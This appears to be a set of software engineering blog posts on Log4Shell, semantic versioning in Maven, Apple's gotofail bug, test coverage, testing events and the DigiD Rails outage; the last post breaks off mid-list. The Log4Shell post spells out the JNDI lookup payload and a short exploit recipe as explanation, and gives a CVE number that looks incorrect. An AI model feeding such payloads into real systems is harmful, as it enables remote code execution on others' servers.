Log4Shell: Lessons Learned for Software Architects

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-4428). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you as a software architects can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would lookup a Java class on the LDAP server mentioned, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

  1. Create a nasty class that you would like to execute on your target;
  2. Set up your own LDAP server somewhere that can serve your nasty class;
  3. "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" where ever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: If your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system to any new attacks (until the system is re-started).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

  1. Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
  2. Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
  3. Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache SOLR, neo4j, Elastic Search, or Apache Struts: See the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Srping, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple, and with an adequate continuous deployment infrastructure a simple push of a button or reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investements in a smooth update process pay off, as well a disciplined versioning approach that encourages customers to update their system regularly, without as little incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood and impact such an event would have on confidentiality, integrity and availability of that system.

This requires investments in:

  • Maintainability: Enforcing dependency hygiene, keeping dependencies current at all times, to minimize mean time to repair and maximize availability
  • Deployment security: Isolating components where possible and logging access, to safeguard confidentiality and integrity;
  • Upgradability: Ensure that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
  • The open source eco-system: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

Launching AFL: The AI for Fintech Lab

AFL Announcement

I am extremely proud that yesterday we publicly announced the AI for Fintech Lab — AFL.

The AI for Fintech Lab (AFL) is a collaboration between ING and Delft University of Technology. The mission of AFL is to perform world-class research at the intersection of Artificial Intelligence, Data Analytics, and Software Analytics in the context of FinTech.

With 36 million customers, activities in 42 countries, and a total of 50,000 employees of which 15,000 work in IT, software and data technology is at the heart of ING’s business and operations. In this context, the AFL seeks to develop new AI-driven theories, methods, and tools in large scale data and software analytics.

Over the next five years, ten PhD researchers will work in the lab. Research topics will include human-centered software analytics, autonomous software engineering, analytics delivery, data integration, and continuous experimentation.

AFL will be bi-located at the ING campus Amsterdam and the TU Delft campus in Delft, bringing together students, engineers, researchers, professors, and entrepreneurs from both organizations at both locations.

ICAI Logo

AFL will join the Innovation Center for Artificial Intelligence (ICAI) as one of its labs. ICAI is a virtual organization consisting of a series of labs of similar size (over five PhD researchers each) funded directly by industry. AFL will benefit from the experience and expertise of other academic and industrial ICAI partners, such as Qualcom, Bosch, Ahold Delhaize, the Dutch National Police, the University of Amsterdam, and Utrecht University.

As scientific director of the brand new AI-for-Fintech Lab, I look forward to this exciting, long term collaboration between ING and TU Delft.

And, yes, we are hiring!

If you’re interested in bringing together industry and academia, if you’re not afraid to work at two locations, and if you have a strong background in computer science (software engineering, artificial intelligence, data science), you are welcome to apply as a PhD student! Details about the application process will follow soon.

Besides PhD students, we will have related positions for postdoctoral researchers and scientific programmers. And of course, TU Delft BSc students and MSc students are welcome to conduct their research projects within the AI for Fintech Lab!

I look forward to a great collaboration spanning at least five years, with exciting new results in the areas of AI, data science, and software engineering!

ING, AFL, and TU Delft logos

Beyond Page Objects

Beyond Page Objects

During the last couple of months I had a good time using Protractor to create an end-to-end test suite for an AngularJS web application.

While applying the Page Object pattern, I realized that I needed more guidance on what page objects to create, and how to navigate through my web application.

To that end, I started drawing little state charts for my web application. Naturally, ‘page objects’ corresponded to states, and their methods to either state inspection methods (is my browser in the correct state?) or state transition methods (clicking this button will bring me to the next state).

Gradually, the following process emerged:

  1. If you want to test certain behavior of your web application, draw a little state diagram to capture the navigation for that behavior.

  2. Create ‘state objects’ for each of the states.

  3. Give each state object its ‘inspection methods’ (what is visible in the web application if I’m in this state) as well as ‘transition methods’ (clicks leading to a new state).

  4. I also find it helpful to give each state object a ‘selfcheck’ method, which just verifies whether the web application is indeed in the state corresponding to the state object.

  5. With the state objects in place, think of the paths you want to take through the application.

  6. The simplest starting point is to write one test for each basic transition: Bring the application in state A, click somehwere, and verify you ended up in the required state B.

  7. Next, you may want to consider longer paths, in which earlier transitions affect later behavior. An example is testing proper use (and resetting of) client-side caching.

I wrote a longer article about this approach, available as “Beyond Page Objects: Testing Web Applications with State Objects”, published in ACM Queue in June 2015, as well as in the Communications of the ACM in August 2015.

The paper also explains how to deal with more complex state machines (using superstates and AND-states, for example), how to use a transition tree to oversee the coverage of longer paths, and how to deal with the infamous back-button. Furthermore, I extended the example “PhoneCat” AngularJS application with a state-object based test suite, available from my GitHub page.

Admittedly, the idea to use state machines for testing purposes is not new at all — yet elaborating how it can be used for testing web applications with WebDriver was helpful to me. I hope you find the use of state objects helpful too.

Semantic Versioning? In Maven Central? Breaking Changes!

I love the use of semantic versioning. It provides clear guidelines when an API version number should be bumped. In particular, if a change to an API breaks backward compatibility, the major version identifier must be updated. Thus, when as a client of such an API I see a minor or patch update, I can safely upgrade, since these will never break my build.

But to what extent are people actually using the guidelines of semantic versioning? Has the adoption of semantic versioning increased over time? Does the use of semantic versioning speedup library upgrades? And if there are breaking changes, are these properly announced by means of deprecation tags?

To better understand semantic versioning, we studied seven years of versioning history in the Maven Central Repository. Here is what we found.

Versioning Policies

Semantic Versioning is a systematic approach to give version numbers to API releases. The approach has been developed by Tom Preston-Werner, and is advocated by GitHub. It is “based on but not necessarily limited to pre-existing widespread common practices in use in both closed and open-source software.”

In a nutshell, semantic versioning is based on MAJOR.MINOR.PATCH identifiers with the following meaning:

  • MAJOR: increment when you make incompatible API changes

  • MINOR: increment when you add functionality in backward compatible manner

  • PATCH: incremented when you make backward-compatible bug fixes

Versioning in Maven Central

To understand how developers actually use versioning policies, we studied 7 years of history of maven. Our study comprises around 130,000 released jar files, of which 100,000 come with source code. On average, we found around 7 versions per library in our data set.

The data set runs from 2006 to 2011, so predates the semantic versioning manifesto. Since the manifesto claims to be based on existing practices, it is interesting to investigate to what extent API developers releasing via maven have adhered to these practices.

As shown below, in Maven Central, the major.minor.patch scheme is adopted by the majority of projects.

Frequency of semver identifiers in maven

Breaking Changes

To understand to what extent version increments correspond to breaking changes, we identified all “update-pairs”: A version as well as its immediate successor of a given maven package.

To be able to assess semantic versioning compliance, we need to determine backward compatibility for such update pairs. Since in general this is undecidable, we use binary compatibility as a proxy. Two libraries are binary compatible, if interchanging them does not force one to recompile. Examples of incompatible changes are removing a public method or class, or adding parameters to a public method.

We used the Clirr tool to detect such binary incompatibilities automatically for Java. For those interested, there is also a SonarQube Clirr plugin for compatibliity checking in a continuous integration setting; An alternative tool is japi.

Major versus Minor/Patch Releases

For major releases, breaking changes are permitted in semantic versioning. This is also what we see in our dataset: A little over 1/3d of the major releases introduces binary incompatibilities:

Breaking changes in major releases

Interestingly, we see a very similar figure for minor releases: A little over 1/3d of the minor releases introduces binary incompatibilities too. This, however, is in violation with the semantic versioning guidelines.

Breaking changes in minor releases

The situation is somewhat better for patch releases, which introduce breaking changes in around 1/4th of the cases. This nevertheless is in conflict with semantic versioning, which insists that patches are compatible.

Breaking changes in patch releases

Overall, we see that minor and major releases are equally likely to introduce breaking changes.

The graph below shows that these trends are fairly stable over time. Minor (~40%) and patch releases (~45%) are most common, and major releases (~15%) are least common.

Adherence over time.

The orange line indicates releases with breaking changes: Around 30% of the releases introduce breaking changes — a number that is slightly decreasing over time, but still at 29%.

Of these releases with breaking changes, the vast majority is non-major (the crossed green line at ~25%). Thus, 1/4th of the releases does not comply with semantic versioning.

Deprecation to the Rescue?

The above analysis demonstrates a deep need to introduce breaking changes: appearantly, developers wish to introduce breaking changes in 30% of their API releases.

Apart from requiring that such changes take place in major releases,
semantic versioning insists on using deprecation to announce such changes. In particular:

Before you completely remove the functionality in a new major release there should be at least one minor release that contains the deprecation so that users can smoothly transition to the new API.

Given the many breaking changes we saw, how many deprecation tags would there be?

At the library level, 1000 out of 20,000 libraries (5%) we studied include at least one depracation tag.

When we look at the individual method level, we find the following:

  • Over 86,000 public methods are removed in a minor release, without any deprecation tag.
  • Almost 800 public methods receive a deprecation tag in their life span: These methods, however, are never removed.
  • 16 public methods receive a deprecation tag that is subsequently undone in a later release (the method is “undeprecated”)

That is all we found. In other words, we did not find a single method that was deprecated according to the guidelines of semantic versioning (deprecate in minor, then delete in major).

Furthermore, the worst behavior (deletion in minor without deprecation, over 86,000 methods) occurs hundred times more often than the best behavior witnessed (deprecation without deletion, almost 800 methods)

Discussion

Our findings are based on a somewhat older dataset obtained from maven. It might therefore be that adherence to semantic versioning at the moment is higher than what we report.

Our findings also take breaking changes to any public method or class into account. In practice, certain packages will be considered as API only, whereas others are internal only — yet declared public due to the limitations of the Java modularization system. We are working on a further analysis in which we explicitly measure to what extent the changed public methods are used. Initial findings within the maven data set suggest that there are hundreds of thousands of compilation problems in clients caused by these breaking changes — suggesting that it is not just internal modules containing these changes.

Some non-Java package managers explicitly have adopted semantic versioning. A notable example is npm, and also nuget has initiated a discussion. While npm has a dedicated library to determine version orderings according to the Semantic Versioning standard, I am not aware of Javascript compatibility tools that are used to check for breaking changes. For .NET (nuget) tools like Clirr exists, such as LibCheck, ApiChange, and the NDepend build comparison tools. I do not know, however, how widespread their use is.

Last but not least, binary incompatibility, as measured by Clirr, is just one form of backward incompatibility. An API may change the behavior of methods as well, in breaking ways. A way to detect those might be by applying old test suites to new code — which we have not done yet.

Conclusion

Breaking API changes are a fact of life. Therefore, meaningful version identifiers are a cause worth fighting for. Thus:

  1. If you adopt semantic versioning for your API, double check that your minor and patch releases are indeed backward compatible. Consider using tools such as clirr, or a dedicated test suite.

  2. If you rely on an API that claims to be following semantic versioning, don’t put too much faith in backward compatibility promises.

  3. If you want to follow semantic versioning, be prepared to bump the major version identifier often.

  4. Should you need to introduce breaking changes, do not forget to announce these with deprecation tags in minor releases first.

  5. If you are in research, note that the problems involved in preventing, encapsulating, detecting, and handling breaking changes are tough and real. Backward compatiblity deserves your research attention.

The full details of our study are published in our paper presented (slides) at the IEEE International Conference on Source Analysis and Manipulation (SCAM), held in Victoria, BC, September 2014.

This post is based on joint work by Steven Raemaekers and Joost Visser, both from the Software Improvement Group.

© Copyright Arie van Deursen, October 2014.

EDIT, November 2014

If you are a Java developer and serious about semantic versioning, then checkout this open source semantic versioning checking tool. It is available on Maven Central and on GitHub, and it can check differences, validate version numbers, and suggest proper version numbers for your new jar release.

Learning from Apple’s #gotofail Security Bug

Yesterday, Apple announced iOS7.0.6, a critical security update for iOS7 — and an update for OSX / Safari is likely to follow soon (if you haven’t updated iOS yet, do it now).

The problem turns out to be caused by a seemingly simple programming error, now widely discussed as #gotofail on Twitter.

What can we, as software engineers and educators of software engineers, learn from this high impact bug?

The Code

A careful analysis of the underlying problem is provided by Adam Langley. The root cause is in the following code:

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
    OSStatus        err;
    ...

    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;
    ...

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;
}

To any software engineer, the two consecutive goto fail lines will be suspicious. They are, and more than that. To quote Adam Langley:

The code will always jump to the end from that second goto, err will contain a successful value because the SHA1 update operation was successful and so the signature verification will never fail.

Not verifying a signature is exploitable. In the upcoming months, there will remain plenty of devices running older versions of iOS and MacOS. These will remain vulnerable, and epxloitable.

Brittle Software Engineering

When first seeing this code, I was once again caught by how incredibly brittle programming is. Just adding a single line of code can bring a system to its knees.

For seasoned software engineers this will not be a real surprise. But students and aspiring software engineers will have a hard time believing it. Therefore, sharing problems like this is essential, in order to create sufficient awareness among students that code quality matters.

Code Formatting is a Security Feature

When reviewing code, I try to be picky on details, including white spaces, tabs, and new lines. Not everyone likes me for that. I often wondered whether I was just annoyingly pedantic, or whether it was the right thing to do.

The case at hand shows that white space is a security concern. The correct indentation immediately shows something fishy is going on, as the final check now has become unreachable:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Insisting on curly braces would hightlight the fault even more:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0) {
        goto fail;
    }
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Indentation Must be Automatic

Because code formatting is a security feature, we must not do it by hand, but use tools to get the indentation right automatically.

A quick inspection of the sslKeyExchange.c source code reveals that it is not routinely formatted automatically: There are plenty of inconsistent spaces, tabs, and code in comments. With modern tools, such as Eclipse-format-on-save, one would not be able to save code like this.

Yet just forcing developers to use formating tools may not be enough. We must also invest in improving the quality of such tools. In some cases, hand-made layout can make a substantial difference in understandability of code. Perhaps current tools do not sufficiently acknowledge such needs, leading to under-use of today’s formatting tools.

Code Review to the Rescue?

Besides automated code formatting, critical reviews might also help. In the words of Adam Langley:

Code review can be effective against these sorts of bug. Not just auditing, but review of each change as it goes in. I’ve no idea what the code review culture is like at Apple but I strongly believe that my colleagues, Wan-Teh or Ryan Sleevi, would have caught it had I slipped up like this. Although not everyone can be blessed with folks like them.

While I fully subscribe to the importance of reviews, a word of caution is at place. My colleague Alberto Bacchelli has investigated how code review is applied today at Microsoft. His findings (published as a paper at ICSE 2013, and nicely summarized by Alex Nederlof as The Truth About Code Reviews) include:

There is a mismatch between the expectations and the actual outcomes of code reviews. From our study, review does not result in identifying defects as often as project members would like and even more rarely detects deep, subtle, or “macro” level issues. Relying on code review in this way for quality assurance may be fraught.

Automated Checkers to the Rescue?

If manual reviews won’t find the problem, perhaps tools can find it? Indeed, the present mistake is a simple example of a problem caused by unreachable code. Any computer science student will be able to write a (basic) “unreachable code detector” that would warn about the unguarded goto fail followed by more (unreachable) code (assuming parsing C is a ‘solved problem’).

Therefore, it is no surprise that plenty of commercial and open source tools exist to check for such problems automatically: Even using the compiler with the right options (presumably -Weverything for Clang) would warn about this problem.

Here, again, the key question is why such tools are not applied. The big problem with tools like these is their lack of precision, leading to too many false alarms. Forcing developers to wade through long lists of irrelevant warnings will do little to prevent bugs like these.

Unfortunately, this lack of precision is a direct consequence of the fact that unreachable code detection (like many other program properties of interest) is a fundamentally undecidable problem. As such, an analysis always needs to make a tradeoff between completeness (covering all suspicious cases) and precision (covering only cases that are certainly incorrect).

To understand the sweet spot in this trade off, more research is needed, both concerning the types of errors that are likely to occur, and concerning techniques to discover them automatically.

Testing is a Security Concern

As an advocate of unit testing, I wonder how the code could have passed a unit test suite.

Unfortunately, the testability of the problematic source code is very poor. In the current code, functions are long, and they cover many cases in different conditional branches. This makes it hard to invoke specific behavior, and bring the functions in a state in which the given behavior can be tested. Furthermore, observability is low, especially since parts of the code deliberately obfuscate results to protect against certain times of attacks.

Thus, given the current code structure, unit testing will be difficult. Nevertheless, the full outcome can be tested, albeit it at the system (not unit) level. Quoting Adam Langley again:

I coded up a very quick test site at https://www.imperialviolet.org:1266. […] If you can load an HTTPS site on port 1266 then you have this bug.

In other words, while the code may be hard to unit test, the system luckily has well defined behavior that can be tested.

Coverage Analysis

Once there is a set of (system or unit level) tests, the coverage of these tests can be used an indicator for (the lack of) completeness of the test suite.

For the bug at hand, even the simplest form of coverage analysis, namely line coverage, would have helped to spot the problem: Since the problematic code results from unreachable code, there is no way to achieve 100% line coverage.

Therefore, any serious attempt to achieve full statement coverage should have revealed this bug.

Note that trying to achieve full statement coverage, especially for security or safety critical code, is not a strange thing to require. For aviation software, statement coverage is required for criticality “level C”:

Level C:

Software whose anomalous behavior, as shown by the system safety assessment process, would cause or contribute to a failure of system function resulting in a major failure condition for the aircraft.

This is one of the weaker categories: For the catastrophic ‘level A’, even stronger test coverage criteria are required. Thus, achieving substantial line coverage is neither impossible nor uncommon.

The Return-Error-Code Idiom

Finally, looking at the full sources of the affected file, one of the key things to notice is the use of the return code idiom to mimic exception handling.

Since C has no built-in exception handling support, a common idiom is to insist that every function returns an error code. Subsequently, every caller must check this returned code, and include an explicit jump to the error handling functionality if the result is not OK.

This is exactly what is done in the present code: The global err variable is set, checked, and returned for every function call, and if not OK followed by (hopefully exactly one) goto fail.

Almost 10 years ago, together with Magiel Bruntink and Tom Tourwe, we conducted a detailed empirical analysis of this idiom in a large code base of an embedded system.

One of the key findings of our paper is that in the code we analyzed we found a defect density of 2.1 deviations from the return code idiom per 1000 lines of code. Thus, in spite of very strict guidelines at the organization involved, we found many examples of not just unchecked calls, but also incorrectly propagated return codes, or incorrectly handled error conditions.

Based on that, we concluded:

The idiom is particularly error prone, due to the fact that it is omnipresent as well as highly tangled, and requires focused and well-thought programming.

It is sad to see our results from 2005 confirmed today.


© Arie van Deursen, February 22, 2014.


EDIT February 24, 2014: Fixed incorrect use of ‘dead code detection’ terminology into correct ‘unreachable code detection’, and weakened the claim that any computer science student can write such a detector based on the reddit discussion.


Test Automation Day 2014

One of the software testing events in The Netherlands I like a lot is the Test Automation Day. It is a one day event, which in 2014 will take place on June 19 in Rotterdam. The day will be packed with (international) speakers, with presentations targeting developers, testers, as well as as management.

Test automation is a broad topic: it aims at offering tool support for software testing processes where ever this is possible. This raises a number of challenging questions:

  • What are the costs and benefits of software test automation? When and why should I apply a given technique?
  • What tools and techniques are available? What are their limitations and how can they be improved?
  • How can automation be applied in such areas as test execution, test case design, test input generation, test output evaluation, and test suite optimization?

squerist

The Test Automation Day was initiated four years ago by Squerist, and organized by CKC Seminars. In the past years, it has brought together over 200 test experts each year. During those years, we have built up some good traditions:

  • We have been able to attract some wonderful keynote speakers, including Scott Barber (performance testing, 2011, 2012), Elfriede Dustin (test automation for the DoD, 2012), Walter Belgers (security, 2012), Mieke Gevers (Agile processes, 2013) Lionel Briand (model-based testing, 2013), Emily Bache (future of test automation, 2013). For 2014, we are in the process of keynote selection and invitation.

  • A mixture of Dutch and international speakers.

  • Coverage of a broad range of topics in parallel tracks.

Workshop with Scott Barber

  • A mixture of different formats, including workshops, keynotes, a hands-on testlab, and tutorials, by such experts as Dorothy Graham, Steve Freeman, and Matt Heuser.

  • Presentations from industry (testers, developers, client organizations) and universities (new research results, tools and techniques), with a focus on practical applicability.

  • A mixture of invited (keynote) presentations, open contributions that can be submitted by anyone working in the area of software test automation, and sponsored presentations.

  • Pre-conference events, which this year will be in the form of a masterclass on Wednesday June 18.

This year’s call for contributions is still open. If you do something cool in the area of software test automation, please submit a proposal for a presentation! Deadline Monday December 2, 2013!

You are very much welcome to submit your proposal. Your proposal will be evaluated by the international TADNL program committee, who will look at the timeliness, innovation, technical content, and inspiration that the audience will draw from your presentation. Also, if you have suggestions for a keynote you would like to hear at TADNL2014, please send me an email!

This year’s special theme is test automation innovation: so if you’re work with or working on some exciting new test automation method or technique, make sure you submit a paper!

We look forward to your contributions, and to seeing you in Rotterdam in June 2014!

Test Automation Day 2013

Test Coverage: Not for Managers?

Last week I was discussing how one of my students could use test coverage analysis in his daily work. His observation was that his manager had little idea about coverage. Do managers need coverage information? Can they do harm with coverage numbers? What good can project leads do with coverage data?

For me, coverage analysis is first and foremost a code reviewing tool. Test coverage information helps me to see which code has not been tested. This I can use to rethink

  1. The test suite: How can I extend the test suite to cover the corner cases that I missed?
  2. The test strategy: Is there a need for me to extend my suite to cover the untested code? Why did I miss it?
  3. The system design: How can I refactor my code so that it becomes easier to test the missing cases?
  4. An incoming change (pull request): Is the contributed code well tested?

Coverage is not a management tool. While coverage information is essential to have good discussions on testing, using test coverage percentages to manage a project calls for caution.

To appreciate why managing by coverage numbers is problematic, let’s look at four common pitfalls of using software metrics in general, and see how they apply to test coverage as well.

Coverage Without Context

A coverage number gives a percentage of statements (or classes, methods, branches, blocks, …) in your program hit by the test suite. But what does such a number mean? Is 80% good or not? When is it good? Why is it good? Should I be alarmed at anything below 50%?

The key observation is that coverage numbers should not be leading: coverage targets (if used at all) should be derived from an overall project goal. For example:

  • We want a well-designed system. Therefore we use coverage analysis to discover classes that are too hard to test and hence call for refactoring;
  • We want to make sure we have meaningful tests in place for all critical behavior. Therefore, we analyze for which parts of this behavior no such tests are in place.
  • We have observed class Foo is bug prone. Hence we monitor its coverage, and no change that decreases its coverage is allowed.
  • For the avionics software system we are building, we need to comply with standard DO178b. Thus, we must demonstrate that we achieve modified condition/decision coverage;

With these higher level goals in place, it is also possible to argue when low coverage is acceptable:

  • These packages are deprecated, so we do not need to rethink the test suite nor its design anymore.
  • These classes take care of the user interface, which we do not consider critical for our application
  • These classes are so simple that we deem automated testing unnecessary.
  • This code has been stable for years, so we do not really care anymore how well it is tested.

Code coverage is a means to an end; it is not a goal in itself.

Treating The Numbers

The number one reason developers are wary of managers using coverage numbers is that it may give incentives to write useless tests.

Measuring Snow

src: flickr

Coverage numbers are easily tricked. All one needs to do is invoke a few methods in the test cases. No need for assertions, or any meaningful verification of the outcomes, and the coverage numbers are likely to go up.

Test cases to game coverage numbers are dangerous:

  1. The resulting test cases are extremely weak. The only information they provide is that a certain sequence of calls does not lead to an unexpected exception.

  2. The faked high coverage may give a false sense of confidence;

  3. The presence of poor tests undermines the testing culture in the team.

Once again: A code coverage percentage is not a goal in itself: It is a means to an end.

One-Track Coverage

There is little information that can be derived from the mere knowledge that a test suite covers 100% of the statements. Which data values went through the statements? Was my if-then conditional exercised with a true as well as a false value? What happens if I invoke my methods in a different order?

Marter track in snow

src: flickr

A lot more information can be derived from the fact that the test suite achieves, say, just 50% test coverage. This means that half of your code is not even touched by the test suite. The number tells you that you cannot use your test suite to say anything about the quality of half of your code base.

As such, statement coverage can tell us when a test suite is inadequate, but it can never tell us whether a test suite is adequate.

For this reason, a narrow focus on a single type of coverage (such as statement coverage) is undesirable. Instead, a team should be aware of a range of different coverage criteria, and use them where appropriate. Example criteria include decision coverage, state transition coverage, data-flow coverage, or mutation coverage — and the only limitation is our imagination, as can be seen from Cem Kaner’s list of 101 coverage metrics, compiled in 1996.

The latter technique, mutation coverage, may help to fight gaming of coverage numbers. The idea is to generate mutations to the code under test, such as the negation of Boolean conditions or integer outcomes, or modifications of arithmetic expressions. A good test suite should trigger a failure for any such ‘erroneous’ motivation. If you want to experiment with mutation testing in Java (or Scala), you might want to take a look at the pitest tool.

Coverage Galore

A final pitfall in using coverage metrics is to become over-enthusiastic, measuring coverage in many (possibly overlapping) ways.

Even a (relatively straightforward) coverage tool like EclEmma for Java can measure instruction, branch, line, method, and type coverage, and as a bonus can compute the cyclomatic complexity. Per metric it can show covered, missed, and total, as well as the percentage of covered items. Which of those should be used? Is it a good idea to monitor all forms of coverage at all levels?

Again, what you measure should depend on your goal.

If your project is just starting to test systematically, a useful goal will be to identify classes where a lot can be gained by adding tests. Then it makes sense to start measuring at the coarse class or method level, in order to identify classes most in need of testing. If, on the other hand, most code is reasonably well tested, looking at missed branches may provide the most insight

The general rule is to start as simple as possible (just line coverage will do), and then to add alternative metrics when the simpler metric does not lead to new insights any more.

Additional forms of coverage should be different from (orthogonal to) the existing form of coverage used. For example, line coverage and branch coverage are relatively similar. Thus, measuring branch coverage besides line coverage may not lead to many additional cases to test (depending on your code). Mutation coverage, dataflow-based coverage, or state-machine based coverage, on the other hand, are much more different from line coverage. Thus, using one of those may be more effective in increasing the diversity of your test cases.

Putting Coverage to Good Use

Managers that are aware of the above pitfalls, can certainly put coverage to good use. Here are a few ways, taken from Glover’s classic Don’t be fooled by the coverage report:

Sun and Snow

src: flickr

  1. “Code without corresponding tests can be more challenging to understand, and is harder to modify safely. Therefore, knowing whether code has been tested, and seeing the actual test coverage numbers, can allow developers and managers to more accurately predict the time needed to modify existing code.” — I can only agree.

  2. “Monitoring coverage reports helps development teams quickly spot code that is growing without corresponding tests” — This happens: see our paper on the co-evolution of test and production code)

  3. “Given that a code coverage report is most effective at demonstrating sections of code without adequate testing, quality assurance personnel can use this data to assess areas of concern with respect to functional testing.” — A good reason to combine user story acceptance testing with coverage analysis.

Summary

Test coverage analysis is an important tool that any development team taking testing seriously should use.

More than anything else, coverage analysis is a reviewing tool that you can use to improve your own (test) code, and to to evaluate someone else’s code and test cases.

Coverage numbers can not be used as a key performance indicator (KPI) for project success. If your manager uses coverage as a KPI, make sure he is aware of the pitfalls.

Coverage analysis is useful to managers: If you are a team lead, make sure you understand test coverage. Then use coverage analysis as a way to engage in discussion with your developers about their (test) code and the team’s test strategy.

Further reading

  1. Eric Bouwers, Joost Visser, and Arie van Deursen. Getting what you Measure: Four common pitfalls in using software metrics for project management. Communications of the ACM, 55(7): 54-59, 2012.
  2. Andrew Glover. In pursuit of code quality: Don’t be fooled by the coverage report. IBM Developer Works blog post, January, 2006.
  3. Martin Fowler. Test Coverage. http://martinfowler.com/bliki/TestCoverage.html, 17 April 2012.
  4. Alberto Savoia. How Much Unit Test Coverage Do You Need? – The Testivus Answer. Artima Forum, 2007. (Also listed as answer to the Stackoverlfow question “What is reasonable code coverage and why?“).
  5. Brian Marick. How to misuse code coverage, 1999
  6. Cem Kaner. Software Negligence and Testing Coverage (Appendix A lists 101 coverage criteria). Proceedings of STAR 96
    (Fifth International Conference on Software Testing, Analysis, and Review), 1996.
  7. Zhu, Hall, May. Software Unit Test Coverage and Adequacy. ACM Computing Surveys, 1997.
  8. Andy Zaidman, Bart Van Rompaey, Arie van Deursen, and Serge Demeyer. Studying the co-evolution of production and test code in open source and industrial developer test processes through repository mining (open access). Empirical Software Engineering 16:325–364, 2011.
  9. Dimitrios Athanasiou. Constructing a Test Code Quality Model and Empirically Assessing its Relation to Issue Handling Performance (pdf). Master’s Thesis, Delft University of Technology, 2011.

© Arie van Deursen, 2013.
Image credits: Flickr.
Source featured image: flickr

Design for Upgradability and the Rails DigiD Outage

On January 9th, the Dutch DigiD system was taken offline for 9 hours. The reason was a vulnerability (CVE-2013-0155 and CVE-2013-0156) in the underlying Ruby on Rails system used. According to the exploit, it enables attackers to bypass authentication, inject SQL, perform a denial of service, or execute arbitrary code.

DigiD is a Dutch authentication system used by over 600 organizations, including the national taxes. Over 9 million Dutch citizens have a DigiD account, which they must use for various interactions with the government, such as filing taxes electronically. The organization responsible for DigiD maintenance, Logius, decided to take DigiD off line when it heard about the vulnerability. It then updated the Rails system to a patched version. The total downtime of DigiD was about 9 hours (from 12:20 until 21:30). Luckily, it seems DigiD was never comprimised.

The threat was real enough, though, as illustrated by the Bitcoin digital currency system: the Bitcoin currency exchange called Vircurex actually was compromised. According to Vircurex, it was able to “deploy fixes within five minutes after receiving the notification from the Rails security mailing list.”

To better understand the DigiD outage, I contacted spokesman Michiel Groeneveld from Logius. He stated that (1) applying the fix was relatively easy, and that (2) most of the down time was caused by “extensively testing” the new release.

Thus, the real lesson to be learned here is that speed of upgrading is crucial to reduce downtime (ensure high availability) in case a third party component turns into a security vulnerability. The software architect caring about both security and availability, must apply design for upgradability (categorized under replaceability in ISO 25010).

Any upgrade can introduce incompatibilities. Even the patch for this Rails vulnerability introduced a regression. Design for upgradability is about dealing with such regressions. It involves:

